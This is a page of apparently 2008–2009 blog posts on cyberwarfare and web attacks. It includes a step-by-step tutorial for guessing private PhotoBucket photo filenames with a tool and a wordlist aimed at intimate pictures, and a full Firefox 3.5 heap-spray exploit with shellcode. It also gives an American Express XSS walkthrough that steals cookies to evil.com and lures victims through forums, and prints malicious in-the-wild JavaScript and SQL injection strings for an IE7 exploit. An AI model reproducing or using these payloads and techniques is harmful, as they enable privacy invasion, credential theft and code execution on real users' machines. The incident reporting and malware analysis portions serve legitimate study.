Cyberwarfare Magazine

Warfare in the Information Age

Posts Tagged ‘Web

Phusking PhotoBucket and Other Pictures Sharing Sites

with 3 comments

It came to me while I was reading an article on Slashdot about sites popping up, offering the customer to hack into a Facebook, MySpace or other social site for 75$ to 100$. EWeek as a similar article[1]. Seems like those sites mostly use social engineering by sending grammatically deficient e-mail to the victim and somehow, still working most of the time. Most of the time, the goal is to get access to private pictures or information. Hacking Facebook and MySpace accounts is the new “How do I hack Hotmail accounts” of the decade. Just search Google for “facebook hacking service” and plenty of website will be returned.

Same thing with pictures from services like PhotoBucket or Flickr and such. Getting pictures from private albums is much more easier thought and is done thru fusking. The goal is simply to access directly pictures from the private album by guessing the filename of the picture.

As you might know, most cameras have a default naming convention, i.e DSC0001.jpg, Picture0001.jpg etc… (see then end of this article for a complete list) and humans, being lazy as they are, don’t bother renaming them. Since I believe that a example is the best way to learn than 30 pages of detailed explanation, here how it’s done.

Let’s create an account on PhotoBucket first. I used a username I always take everywhere, but it seems that Photobucket didn’t liked it:

PhotoBucket New Account Error

PhotoBucket didn't like me the first time...

Anyway, just deleting the Photobucket cookie solve the problem. Registered using brand new data. Small tips, if you are looking for zip code, try this page: Find A Zip, it has about every zip code for every town in the US (I haven’t verified but looks like it…).

Once in, I created a private album and put two pictures in it; one I renamed and the other I left with a camera default filename.

PhotoBucket Private Album Creation

Private album I created in Photobucket

I named one of those pictures DSC0005.jpg and the other an uncommon name:

PhotoBucket Private Pictures

Private pictures I put into my private album

The URL of my private album is

http://s991.photobucket.com/albums/af33/Cheetah897/Real%20Private%20Album/

The filename is

DSC0005.jpg

So just to try out the concept,  I signed out and look if, with the album’s URL and the filename, could access the picture. Oh ! Look at that:

PhotoBucket Private Picture Direct Link

Accessing a private picture thru a direct link

So you should be able to guess the rest from here. Nevertheless, there are tools out there to even do the guessing work for you. The one I will use is PHUSK. It’s especially done for PhotoBucket and is for Windows. This shouldn’t be hard to program for another website and another platform.

PHUSK 1.5 Main Window

PHUSK 1.5 Main Window

There is really not much to explain, just type the username of the victim and set up any properties you want (which are pretty much self explanatory). On the first try, it didn’t found any private album, so I had to specify it by selecting “advanced mode” which show this window:

PHUSK 1.5 Advanced Mode Windows

PHUSK 1.5 Advanced Mode Windows

Select “Add Album”, type the album name and then it will appear in the list of albums (which is ordered).

PHUSK 1.5 Add Album Name

PHUSK 1.5 Added Album Name in the List

Started PHUSK again and this time it found the private album, it will then try to brute force filenames, which might take a while.

PHUSK 1.5 Result Window

My private picture with a default filename has been found !

I changed the default lists to make it faster, otherwise it might take a long time (411 albums name X 439 filenames X ~9999 file numbers each…).

Here is a list of filenames used by PHUSK. This can be use to build your own list.

###.jpg Unknown-#.jpg Me.jpg
##.jpg Untitled-###.jpg ME.jpg
#.jpg Untitled-##.jpg mygirls.jpg
Picture###.jpg Untitled-#.jpg Mygirls.jpg
Picture##.jpg untitled-###.jpg MYGIRLS.jpg
Picture#.jpg untitled-##.jpg fine.jpg
Photo###.jpg untitled-#.jpg Fine.jpg
Photo##.jpg stuff###.jpg FINE.jpg
Photo#.jpg stuff##.jpg sexy.jpg
#####.jpg stuff#.jpg Sexy.jpg
####.jpg Stuff###.jpg SEXY.jpg
CIMG####.jpg Stuff##.jpg hot.jpg
CIMG####.JPG Stuff#.jpg Hot.jpg
DSCN####.jpg stuff-###.jpg HOT.jpg
PICT####.jpg stuff-##.jpg hott.jpg
DSC_####.jpg stuff-#.jpg Hott.jpg
DSC0####.jpg mycamerapics###.jpg HOTT.jpg
Image###.jpg mycamerapics##.jpg really.jpg
Image##.jpg mycamerapics#.jpg Really.jpg
Image##.JPG mypics###.jpg REALLY.jpg
Image#.jpg mypics##.jpg ass.jpg
PICT####.JPG mypics#.jpg Ass.jpg
IMG_####.jpg Misc-###.jpg ASS.jpg
_MG_####.jpg Misc-##.jpg bad.jpg
000_####.jpg Misc-#.jpg Bad.jpg
001_####.jpg misc###.jpg BAD.jpg
100_####.jpg misc##.jpg face.jpg
100-####.jpg misc#.jpg Face.jpg
100-####_IMG.jpg misc-new###.jpg FACE.jpg
101_####.jpg misc-new##.jpg page.jpg
101-####.jpg misc-new#.jpg Page.jpg
101-####_IMG.jpg New###.jpg PAGE.jpg
102_####.jpg New##.jpg tits.jpg
102-####.jpg New#.jpg Tits.jpg
102-####_IMG.jpg New-###.jpg TITS.jpg
103-####.jpg New-##.jpg boobs.jpg
103_####.jpg New-#.jpg Boobs.jpg
0##########.jpg new###.jpg BOOBS.jpg
1##########.jpg new##.jpg breasts.jpg
0########.jpg new#.jpg Breasts.jpg
1########.jpg new-###.jpg BREASTS.jpg
########.jpg new-##.jpg naughty.jpg
#######.jpg new-#.jpg Naughty.jpg
######.jpg Old###.jpg NAUGHTY.jpg
Cimg####.jpg Old##.jpg smile.jpg
DCAM####.jpg Old#.jpg Smile.jpg
DC####S.jpg old###.jpg SMILE.jpg
DCFN####.jpg old##.jpg light.jpg
DCP_####.jpg old#.jpg Light.jpg
DCP0####.jpg nude###.jpg LIGHT.jpg
dsc#####.jpg nude##.jpg kiss.jpg
DSC#####.jpg nude#.jpg Kiss.jpg
DSC####.jpg Nude###.jpg KISS.jpg
dsc0####.jpg Nude##.jpg kisses.jpg
DSCF####.jpg Nude#.jpg Kisses.jpg
DSCF####.JPG Sexy###.jpg KISSES.jpg
dscf####.jpg Sexy##.jpg muah.jpg
DSCI####.jpg Sexy#.jpg Muah.jpg
DSCI####.JPG sexy###.jpg MUAH.jpg
dscn####.jpg sexy##.jpg mwah.jpg
EX00####.jpg sexy#.jpg Mwah.jpg
HPIM####.jpg sexxy###.jpg MWAH.jpg
IM00####.jpg sexxy##.jpg drunk.jpg
IMAG####.jpg sexxy#.jpg Drunk.jpg
IMAGE_####.jpg pictures###.jpg DRUNK.jpg
IMAGE####.jpg pictures##.jpg drunken.jpg
IMG0####.jpg pictures#.jpg Drunken.jpg
IMG####.jpg Pictures###.jpg DRUNKEN.jpg
Img#####.jpg Pictures##.jpg sleep.jpg
IMG_00####.jpg Pictures#.jpg Sleep.jpg
IMG_#####.jpg sexypic###.jpg SLEEP.jpg
IMG_####.JPG sexypic##.jpg sleeping.jpg
IMGA####.JPG sexypic#.jpg Sleeping.jpg
IMGP####.JPG sexypics###.jpg SLEEPING.jpg
IMGP####.jpg sexypics##.jpg tongue.jpg
IMPG####.jpg sexypics#.jpg Tongue.jpg
KIF_####.jpg Smile###.jpg TONGUE.jpg
mvc#####.jpg Smile##.jpg cute.jpg
MVC0####.jpg Smile#.jpg Cute.jpg
MVC-####.jpg smile###.jpg CUTE.jpg
MYDC####.jpg smile##.jpg hehe.jpg
P00#####.jpg smile#.jpg Hehe.jpg
P10#####.jpg mirror###.jpg HEHE.jpg
P101####.jpg mirror##.jpg us.jpg
PC00####.jpg mirror#.jpg Us.jpg
PANA####.JPG single###.jpg US.jpg
PDR_####.JPG single##.jpg mesexy.jpg
PDR_####.jpg single#.jpg Mesexy.jpg
PDRM####.JPG Happy###.jpg MESEXY.jpg
PDRM####.jpg Happy##.jpg underwear.jpg
pdrm####.jpg Happy#.jpg Underwear.jpg
pict####.jpg happy###.jpg UNDERWEAR.jpg
Picture#####.jpg happy##.jpg thong.jpg
Picture####.jpg happy#.jpg Thong.jpg
Picture###-1.jpg picture###.jpg THONG.jpg
Picture##-1.jpg picture##.jpg panties.jpg
Picture#-1.jpg picture#.jpg Panties.jpg
Picture###-2.jpg cute###.jpg PANTIES.jpg
Picture##-2.jpg cute##.jpg bra.jpg
Picture#-2.jpg cute#.jpg Bra.jpg
Photo####.jpg xxx###.jpg BRA.jpg
Photo###-1.jpg xxx##.jpg costume.jpg
Photo##-1.jpg xxx#.jpg Costume.jpg
Photo#-1.jpg delete###.jpg COSTUME.jpg
S#######.jpg delete##.jpg heart.jpg
S######.jpg delete#.jpg Heart.jpg
S#####.jpg Halloween###.jpg HEART.jpg
S####.jpg Halloween##.jpg bed.jpg
SANY####.jpg Halloween#.jpg Bed.jpg
SDC#####.jpg halloween###.jpg BED.jpg
scan#####.jpg halloween##.jpg shower.jpg
SPA#####.jpg halloween#.jpg Shower.jpg
ST@_#####.jpg Me###.jpg SHOWER.jpg
STA#####.jpg Me##.jpg bath.jpg
STP#####.jpg Me#.jpg Bath.jpg
PANA###.jpg ME###.jpg BATH.jpg
{user}#.jpg ME##.jpg closet.jpg
DSCI###.jpg ME#.jpg Closet.jpg
DigitalCamera###.jpg me###.jpg CLOSET.jpg
Image(##).jpg me##.jpg kitchen.jpg
Image(##).JPG me#.jpg Kitchen.jpg
mvc-###.jpg 1-###.jpg KITCHEN.jpg
MVC-###.jpg 1-##.jpg fridge.jpg
Sony#.jpg 1-#.jpg Fridge.jpg
PhotoMoto_####.jpg IMG_###.jpg FRIDGE.jpg
###-1.jpg IMG_##.jpg table.jpg
##-1.jpg IMG_#.jpg Table.jpg
#-1.jpg naughty###.jpg TABLE.jpg
Picture###.png naughty##.jpg risque.jpg
Picture##.png naughty#.jpg Risque.jpg
Picture#.png Naughty###.jpg RISQUE.jpg
stuff###.jpg Naughty##.jpg new.jpg
stuff##.jpg Naughty#.jpg New.jpg
stuff#.jpg ass###.jpg NEW.jpg
stuff-#.jpg ass##.jpg old.jpg
S###.jpg ass#.jpg Old.jpg
S##.jpg Ass###.jpg OLD.jpg
S#.jpg Ass##.jpg halloween.jpg
s###.jpg Ass#.jpg Halloween.jpg
s##.jpg Pic###.jpg HALLOWEEN.jpg
s#.jpg Pic##.jpg cleavage.jpg
unknown-###.jpg Pic#.jpg Cleavage.jpg
unknown-##.jpg pic###.jpg CLEAVAGE.jpg
unknown-#.jpg pic##.jpg pic.jpg
Unknown-###.jpg pic#.jpg Pic.jpg
Unknown-##.jpg me.jpg PIC.jpg

So basically, the way out of phuskers is only to rename your files so that it won’t fit any of the above masks. So a simple description (3-5 words) on what’s on the picture might be able to defeat most of these software.

So here you have it how to get pictures from Photobucket.  Although I haven’t shown it here, this concept can be used for other picture sharing sites. As in anything that ever existed, this can be used for good and evil purposes. I started to get interested in computer security by reading that stuff when I was young so my goal here is to do the same, knowing that some script kiddies will probably use this.

Sayonnara


1 Security Researchers Find Alleged Facebook Hacking Service ”, Brian Prince, eWeek, September 18, 2009,http://www.eweek.com/c/a/Security/Security-Researchers-Find-Alleged-Facebook-Hacking-Service-358854/ 2009-12-29

Advertisements

Written by Jonathan Racicot

December 30, 2009 at 1:17 am

RAAF website defaced

with 3 comments

Atul Dwivedi, an Indian hacker paid a visit to the Royal Australian Air Force (RAAF) last Monday by defacing their website.

This accident comes amid a raise in violence targeted towards Indian native in Australia and apparently Dwivedi protested this situation by leaving a message on the website:

“This site has been hacked by Atul Dwivedi. This is a warning message to the Australian government. Immediately take all measures to stop racist attacks against Indian students in Australia or else I will pawn all your cyber properties like this one.”

Racist incident in Australia against Indian students has increased in the last months

Racist incident in Australia against Indian students has increased in the last months

This site is now up and running as per normal. Of course the webserver wasn’t connected to any internal network and didn’t contain any classified information according to a spokewoman:

“No sensitive information was compromised as the air force internet website is hosted on an external server and, as such, does not hold any sensitive information,1

Microsoft products are used in pretty much every Western armed forces. So it’s save to assume the webserver used by the RAAF is probably running IIS. Of course, IIS implies as Windows machine and a Windows Server machine means that everything is almost certainly all Microsoft based. Of course we can now verify those claims and according to David M Williams from ITWire2 the website is hosted through Net Logistics, an Australian hosting company. The aforementioned article tries to explain the hack with the use of exploits. Which might have been the way Dwivedi did it, but the analysis is quite simple and lacks depth. The site still has an excellent link to a blog detailing the WebDAV exploit, see below for the link.

It’s not impossible to think that Dwivedi might have tricked someone into giving out too much information also. Social engineering can do lots and is usually easier than technical exploits. The Art of Deception by Kevin Mitnick should convince most people of that. Someone could look up on Facebook or another social networking site for some people in the RAAF and then try to pose as them and pose as them.

Then also, why not look for the FTP server? And God knows what else the server is running; maybe a SMTP server also (and probably it does). Now I wouldn’t suggest doing this, but running a port scan would probably reveal a lot of information. Moreover, using web vulnerability tools like Nikto could help find misconfigured settings in ASP or forgotten test/setup pages/files. Up to there, only two things are important: information gathering and imagination.

See also:

Hacker breaks into RAAF website”, AAP, Brisbane Times, July 16, 2009, http://news.brisbanetimes.com.au/breaking-news-national/hacker-breaks-into-raaf-website-20090716-dmrn.html accessed on 2009-07-17

WebDAV Detection, Vulnerability Checking and Exploitation”, Andrew, SkullSecurity, May 20, 2009, http://www.skullsecurity.org/blog/?p=285 accessed on 2009-07-17


1Indian hacks RAAF website over student attacks”, Asher Moses, The Sydney Morning Herald, July 16, 2009, http://www.smh.com.au/technology/security/indian-hacks-raaf-website-over-student-attacks-20090716-dmgo.html accessed on 2009-07-16

2 “How did Atul Dwivedi hack the RAAF web site this week?”, David M Williams, ITWire, July 17, 2009, http://www.itwire.com/content/view/26344/53/ accessed on 2009-07-16

Firefox Javascript Vulnerability

with one comment

Once again, Javascript is the source of a new exploit that has been recently discovered on Firefox1. The vulnerability can be exploited by crafting malicious Javascript code on a Firefox 3.5 browser and leads to the execution of arbitrary code on the user’s machine. This is due to a vulnerability in the JIT engine of Firefox and affects machine running a x86, SPARC or arm architectures.

The vulnerability resolves around the return value of the escape function in the JIT engine. It’s exploited using the <font> tag. The code for the exploit is public and can be found at milw0rm. The exploit use a heap spraying technique to execute the shellcode.

<html>
<head>
<title>Firefox 3.5 Vulnerability</title>
Firefox 3.5 Heap Spray Vulnerabilty
</br>
Author: SBerry aka Simon Berry-Byrne
</br>
Thanks to HD Moore for the insight and Metasploit for the payload
<div id="content">

<p>
<FONT>                             
</FONT>
</p>
<p>
<FONT>Loremipsumdoloregkuw</FONT></p>
<p>

<FONT>Loremipsumdoloregkuwiert</FONT>
</p>
<p>
<FONT>Loremikdkw  </FONT>
</p>
</div>
<script language=JavaScript>

 
/* Calc.exe */
var shellcode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800"+   
                       "%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +   
                       "%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +   
                       "%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +   
                       "%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +   
                       "%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +   
                       "%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +   
                       "%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +   
                       "%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +   
                       "%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +   
                       "%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +   
                       "%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +   
                       "%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +   
                       "%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +   
                       "%u652E%u6578%u9000");
/* Heap Spray Code */            
oneblock = unescape("%u0c0c%u0c0c");
var fullblock = oneblock;
while (fullblock.length<0x60000)  
{
    fullblock += fullblock;
}
sprayContainer = new Array();
for (i=0; i<600; i++)  
{
    sprayContainer[i] = fullblock + shellcode;
}
var searchArray = new Array()
 
function escapeData(data)
{
 var i;
 var c;
 var escData='';
 for(i=0;i<data.length;i++)
  {
   c=data.charAt(i);
   if(c=='&' || c=='?' || c=='=' || c=='%' || c==' ') c = escape(c);
   escData+=c;
  }
 return escData;
}
 
function DataTranslator(){
    searchArray = new Array();
    searchArray[0] = new Array();
    searchArray[0]["str"] = "blah";
    var newElement = document.getElementById("content")
    if (document.getElementsByTagName) {
        var i=0;
        pTags = newElement.getElementsByTagName("p")
        if (pTags.length > 0)  
        while (i<pTags.length)
        {
            oTags = pTags[i].getElementsByTagName("font")
            searchArray[i+1] = new Array()
            if (oTags[0])  
            {
                searchArray[i+1]["str"] = oTags[0].innerHTML;
            }
            i++
        }
    }
}
 
function GenerateHTML()
{
    var html = "";
    for (i=1;i<searchArray.length;i++)
    {
        html += escapeData(searchArray[i]["str"])
    }    
}
DataTranslator();
GenerateHTML()

</script>
</body>
</html>
<html><body></body></html>

# milw0rm.com [2009-07-13]

A fix should be available soon, but the best solution is always to disable Javascript, although a lot of sites rely on it to operate. Another way is to use the NoScript plug-in, which let you enable and disable scripts easily according to a whitelist/blacklist system.

See also:

Mozilla Firefox Memory Corruption Vulnerability”, Secunia, July 14, 2009, http://secunia.com/advisories/35798/ accessed on 2009-07-15

Exploit 9137”, SBerry, July 13, 2009, http://milw0rm.com/exploits/9137 accessed on 2009-07-15

Stopgap Fix for Critical Firefox 3.5 Security Hole”, Brian Krebs, The Washington Post, July 14, 2009, http://voices.washingtonpost.com/securityfix/2009/07/stopgap_fix_for_critical_firef.html accessed on 2009-07-15

Critical JavaScript vulnerability in Firefox 3.5”, Mozilla Security Blog, July 14, 2009, http://blog.mozilla.com/security/2009/07/14/critical-javascript-vulnerability-in-firefox-35/ accessed on 2009-07-15


1 “Mozilla Foundation tackles Firefox bug”, Nick Farell, The Inquirer, Wednesday, 15, July, 2009, http://www.theinquirer.net/inquirer/news/1433480/mozilla-foundation-tackles-firefox-bug accessed on 2009-07-15

Written by Jonathan Racicot

July 15, 2009 at 3:41 pm

The Palestine-Israeli Conflict on the Web

with 14 comments

As any conflict that happened in the 21st century, there is usually a parallel conflict raging online as well. Either commanded by individuals or groups, which can be helped or not by either government agencies or other interest groups, acts of cyberwarfare are getting more and more common. The conflict in the Gaza strip offers a new opportunity to explore this kind of activity. This time, reports of websites defacement are numerous and ongoing, some reporting that malware is spreaded from hacked websites and even an Israeli botnet is starting to grow in order to attack Hamas supporters servers.

Reports are now growing over hundreds of websites defacements of Western websites by Palestinians supporters1. Various Palestinian groups and supporters have been vandalizing Israeli and other western nation commercial websites by putting propaganda and redirecting to jihadist forums and/or uploading malware on the hacked web servers. Hackers mentioned in the article are Team Evil, DNS Team, Tw!$3r, KaSPeRs HaCKeR CreW, PaLiSeNiaN HaCK, MoRoCcAn HaCkErZ.

Palestinian Propaghanda insert into Defaced Websites

Palestinian Propaganda insert into Defaced Websites

Recently, sites from the U.S Army and NATO have also been targeted by the vandals2. Archived versions of the hacked NATO webpage can be found here and here for the hacked version of the U.S Army website. For now, only defacements have been reported and no real attack has occured. Web defacement is a very easy attack to do on web servers with weak passwords. Most of the time, the attackers are script kiddies using software such as AccessDiver with a list of proxies and wordlists to conduct dictionaries attacks on servers. Using AccessDiver is fairly simple and many tutorials can be found on YouTube. Other ways include of course exploits and SQL injections attacks. Surprisingly, no DDoS attacks have been reported yet, but a group of Israeli students launch the “Help Israel Win” initiative3. At the time of writing, the website was online available through Google’s cache. Anoher website (http://help-israel-win.tk/) has been suspended. The goal was to develop a voluntary botnet dubbed “Patriot” to attack Hamas-related websites:

We have launched a new project that unites the computer capabilities of many computers around the world. Our goal is to use this power in order to disrupt our enemy’s efforts to destroy the state of Israel4.

The website offered a small executable to download. This bot would receive commands as a normal criminal bot would. Hamas-friendly sites like qudsnews.net and palestine-info.info were targeted by the IRC botnet. Still according to the article, the botnet has come under attack by unknown assaillants5. No definitive number is given as to how many machines the botnet is controlling, it might range from anything from 1000 to 8000 machines6. Very few detail is given on how the bot actually works.

There was a very similar attempt to create a “conscript” botnet known as the e-Jihad botnet that failed to realized its objective last year, as the tool was unsophisticated and rather crude7. The e-Jihad tool had the same objective as the Patriot botnet, which was to launch DDoS attacks against various targets.

e-Jihad 3.0 Screen

e-Jihad 3.0 Screen

Nevertheless, this kind of parallel attack is due to become a popular civilian option to attack servers. The only thing needed is to create a solid botnet, by using some of the most sophisticated criminal botnets and transform them into voluntary “cyber-armies”. There is one problem thought…how can we make sure it’s legitimate ? Making such programs open source ? But then you reveal your command and control servers and information that could make the enemy hijack our own botnet. It then all comes down to a question of trust…and of course, a clear and easy way to remove the bot anytime.

See also :

“Army Mil and NATO Paliarment hacked by Turks”, Roberto Preatoni,  Zone-H, http://www.zone-h.org/content/view/15003/30/ (accessed on January 10, 2009)



1“Battle for Gaza Fought on the Web, Too”, Jart Armin, Internet Evolution, January 5, 2009, http://www.internetevolution.com/author.asp?section_id=717&doc_id=169872& (accessed on January 10, 2009)

2“Pro-Palestine vandals deface Army, NATO sites”, Dan Goodin, The Register, January 10, 2009, http://www.theregister.co.uk/2009/01/10/army_nato_sites_defaced/ (accessed on January 10, 2009)

3“Wage Cyberwar Against Hamas, Surrender Your PC”, Noah Shachtman, Danger Room, Wired, January 8, 2009, http://blog.wired.com/defense/2009/01/israel-dns-hack.html, (accessed on January 10, 2009)

4Copied from Google’s cache of help-israel-win.org

5Ibid.

6Hacktivist tool targets Hamas”, John Leyden, The Register, January 9, 2008, http://www.theregister.co.uk/2009/01/09/gaza_conflict_patriot_cyberwars/ (accessed on January 10, 2009)

7“E-Jihad vs. Storm”, Peter Coogan, Symantec, September 11, 2007, https://forums.symantec.com/t5/blogs/blogarticlepage/blog-id/malicious_code/article-id/170#M170 (accessed on January 10, 2009)

A Quick Amex XSS

with one comment

Here is a quick description of a cross-site script exploit that was fixed today on the American Express website.

The vulnerability was in the search engine of the site, which didn’t sanitized the input keywords. Therefore anyone could insert JavaScript into the search and use this to trick people into sending their cookies to the attacker.

All you need to do is

1)      Setup a web server or register for a free web hosting service that supports any type of server-side script (Perl, PHP, ASP etc…)

2)      Create a script to save the stolen cookies into a file or database and put it online.

3)      Get the link of the malicious search link. The code snipplet needed to cause the search to inject JavaScript is:

"><script>XXX</script>

Where XXX is your code that does what ever you want it to do. If you want to steal the cookie, it code would then be something like:

"><script>location.href='http://evil.com/cookie.php?'+document.cookie</script>

So the link to use to lure people into sending their cookies would be something like:

http://find.americanexpress.com/search?q=%22%3E%3Cscript%3Elocation.href=’http://evil.com/cookie.php?’%2Bdocument.cookie%3C/script%3E

4)      Place this link into forums about American Express or credit cards (since there is a better chance that people using these forums are using the Amex website, and therefore have cookies…)

Now this XSS have been fixed after it started to go public. This folk[1], who found the bug, had a particular hard time convincing Amex about this security problem.

A video of the simple exploit is available  at :http://holisticinfosec.org/video/online_finance/amex.html

See also:

American Express web bug exposes card holders“, Dan Goodin, The Register, December 16, 2008, http://www.theregister.co.uk/2008/12/16/american_express_website_bug/ (accessed on December 17, 2008)


[1] “Holistic Security”, Russ McRee, December 17, 2008 http://holisticinfosec.blogspot.com/2008/12/online-finance-flaw-american-express.html (accessed on December 17, 2008)

Written by Jonathan Racicot

December 17, 2008 at 4:32 pm

Internet Explorer 7 Attack in the Wild

with 6 comments

Bits of information about the new 0-day exploit are surfacing on the web. This exploit provokes a heap overflow in the XML parser of Internet Explorer 7. The exploit works with the fully patched version of Windows XP, Windows Server 2008 and Windows Vista SP1[1].

The Infection

The exploit is initiated by a JavaScript file stored on infected servers across the web. The example given by the SANS Internet Storm Center is located at http://17gamo [dot] com/1.js. F-Secure also reported the http://www.nihaorr1.com/1.js URL as being infected. The content of the JavaScript file is injected through sites by a SQL injection attack and it contains a link to a web page containing the exploit and the shellcode. A complete list of infected websites can be found at Shadowserver.

The contents of the 1.js file (be careful of what you do with this info!):

document.writeln("<script src=\"http:\/\/count48.51yes.com\/click.aspx?id=484329676&logo=1\">
<\/script>");
document.write("<iframe width=100 height=0 src=http://www.17gamo.com/co/index.htm>
<\/iframe>");

The SQL injection works by adding a link to every text field contained in an accessible database. Therefore, once text contained in the database is retrieved to be displayed on the webpage, the malicious link to the JavaScript is also included in it and executes the contents of the file, which contains two statements.  One is a counter to measure how many victimes it made, the other is an iFrame to the malicious webpage. The SQL injection usually takes this form, but it really depends on which software is attacked:

rtrim(convert(varchar(4000),['+@C+']))+''<script src=http://17gamo [dot] com/1.js>
</script>''')FETCH NEXT FROM

The Exploit

This is part of the JavaScript found in the while. It checks the version of the browser and OS and triggers the buffer overflow:

sleep(6000);
</script>

nav = navigator.userAgent.toLowerCase();

if (navigator.appVersion.indexOf(‘MSIE’) != -1) {
    version = parseFloat(navigator.appVersion.split(‘MSIE’)[1])
}

if (version==7) {
w2k3 = ((nav.indexOf(‘windows nt 5.2’) != -1) || (nav.indexOf(‘windows 2003’) != -1));
wxp = ((nav.indexOf(‘windows nt 5.1’) != -1) || (nav.indexOf(‘windows xp’) != -1));

    if (wxp || w2k3)
document.write(‘<XML ID=I><X>    <C><![CDATA[<image 
SRC=http://&amp;#2570;&amp;#2570;.xxxxx.org    >]]></C></X>
</XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
</SPAN>’);

    var i=1;
    while (i <= 10 ) {
        window.status= “ ”; i++;
    }
}
</script>

You can get a working example at milw0rm.com.

The script used in the wild waits for 6 seconds before starting, apparently to fool anti-viruses. It then verifies if the current browser is Internet Explorer and if it’s version 7. It also checks that the OS is Windows XP or 2003 (but the exploit does work in Vista also). If all conditions are met, the script will then write the malformed XML code to exploit to the parser. The loop at the end keeps the status bar from displaying any information to the user. The parsing of the XML code will trigger a heap overflow in the parser and arbitrary code can be executed.

The vulnerability is explained more in detailed by the Chinese researchers[2] that first discovered the exploit and that released the code by mistake. The original article is written in Mandarin, but a rough translation from Google leads to a mistake in the handling of pointers when “SDHTML objects” are created. A machine translated post on a forum gave that information[3]:

Recently caught using IE7 0day vulnerability code, as in dealing with the object SDHTML errors lead to memory disorders, through the structural conditions of a specific code lead to cross-border memory. 现已有人赶制出网马生成器相信会在短期内流行。 It was now working towards a network of horse generator, will be popular in the short term. 该漏洞存在于IE7XML可以导致内存越界的漏洞攻击者通过构造畸形XML代码并且使用JavaScript脚本操作ShellCode去执行任意代码。 The vulnerability exists in IE7’s XML, the memory can lead to cross-border loopholes, the attacker through the abnormal structure using JavaScript and XML code script ShellCode operation to execute arbitrary code.
漏洞描述 Description of the loopholes:
由于SDHTML里处理对象存在错误导致内存紊乱通过构造某种条件可以使得SDHTML检测到错误释放已被分配的对象但是在释放已被分配的对象后SDHTML并未返回而是继续使用被释放的对象的内存执行如果这些内存又被分配给其他用途将导致SDHTML把这些内存当作一个对象来操作。 SDHTML due to errors in handling the object lead to memory disorders, through some kind of structural conditions can make mistakes SDHTML detected the release of the allocation has been the target, but the release has been the target of the distribution did not return after SDHTML be released but continue to use the object The implementation of the memory, if memory has been allocated to other purposes, such SDHTML will lead to memory as an object to the operation. 攻击者使用了XMLSRC字符串对象占用了这些释放对象的空间而对象指针里包含函数例程指针最终导致代码执行。 An attacker using the XML string SRC release of these objects taking up space objects, and object pointer included in routine function pointer, leading to the implementation of the code.

This hole wasn’t patch with the latest update from Microsoft. No details are available on when a hotfix will be distributed. Disabling Active Scripting will prevent this exploit from downloading the Trojan. Doing so will also protect anyone from most of the online attacks (but it will also make some sites unusable). Other solution: use Firefox or Opera. And for the geekiest, you can always use the safest browser around by downloading it here.

Observed Payload

Right now, it seems these attacks using this exploit are limited to MMORPG password stealers. The shellcode included with the current exploit will download http://www [dot] steoo [dot] com/admin/win.exe[4]. F-secure detect the trojan contained in the file as Win32.Magania and as Infostealer.Gamania[5] by Symantec. This malware is a game password stealing Trojan for games created by the Taiwanese company Gamania, creator of Maple Story amongst others.

The trojan will create various files into the %SYSTEM% directory and add himself in the registry so that it boots every time the computer starts. Files created include[6]:

  • %System%\Kerne0223.exe
  • %System%\Kerne0223.dll
  • %Windir%\SVCH0ST.EXE
  • %System%\aer4532gxa.dll (detected as Infostealer.Lineage)
  • [PATH TO TROJAN]\gg.bat
  • %System%\drivers\etc\hosts
  • c:\log.txt

And will steal every credentials entered by the user on these sites:

  • [http://]club.pchome.com.tw
  • [http://]gash.gamania.com/gash_loginform1.asp?Message=
  • [http://]tw.gamania.com/default.asp?user_locate=
  • [http://]tw.gamania.com/ghome/home_center.asp
  • [http://]tw.gamania.com/ghome/home_login.asp?Message=
  • [http://]tw.gamania.com/ghome/home_login.asp?user_locate=/ghome/home_center.asp
  • [http://]tw.gashcard.gamania.com/
  • [http://]www.gamania.com/ghome/home_center.asp
  • [https://]gash.gamania.com/gashinclude/top.asp
  • [https://]gash.gamania.com/gashindex.asp
  • [https://]gash.gamania.com/joinwithgama/
  • [https://]gash.gamania.com/openmainaccount/
  • [https://]gash.gamania.com/queryaccount/
  • [https://]tw.event.gamania.com/lineageevent/e20050502/index.asp
  • [https://]tw.event.gamania.com/lineageevent/modify_warehouse_pwd/index.asp
  • [https://]tw.gash.gamania.com/GASHLogin.aspx?
  • [https://]tw.gash.gamania.com/UpdateMainAccountPassword.aspx
  • [https://]tw.gash.gamania.com/UpdateServiceAccountPassword.aspx?
  • [https://]tw.gash.gamania.com/accountctr/changeservicepwd.asp
  • [https://]tw.gash.gamania.com/gashindex.asp
  • [https://]tw.gash.gamania.com/index.aspx
  • [https://]tw.gash.gamania.com/joinwithgama/
  • [https://]tw.goodlock.gamania.com/ShowNew.aspx
  • [https://]tw.goodlock.gamania.com/changeservicepwd.asp
  • [https://]tw.goodlock.gamania.com/index.aspx

It is strongly believed that this Trojan origin is based in China. Various variants of this Trojan have been created. Variants may come with a keylogger and rootkits.

See also:

“Microsoft Security Advisory (961051)”, Microsoft, December 10, 2008, http://www.microsoft.com/technet/security/advisory/961051.mspx (accessed on December 11, 2008)

“Mass SQL Injection”, F-Secure, December 11, 2008, http://www.f-secure.com/weblog/archives/00001427.html (accessed on December 11, 2008)

“Chinese researchers inadvertently release IE7 exploit code”, John Leyden, The Register, December 11, 2008, http://www.theregister.co.uk/2008/12/11/ie7_exploit_leak/ (accessed on December 11, 2008)

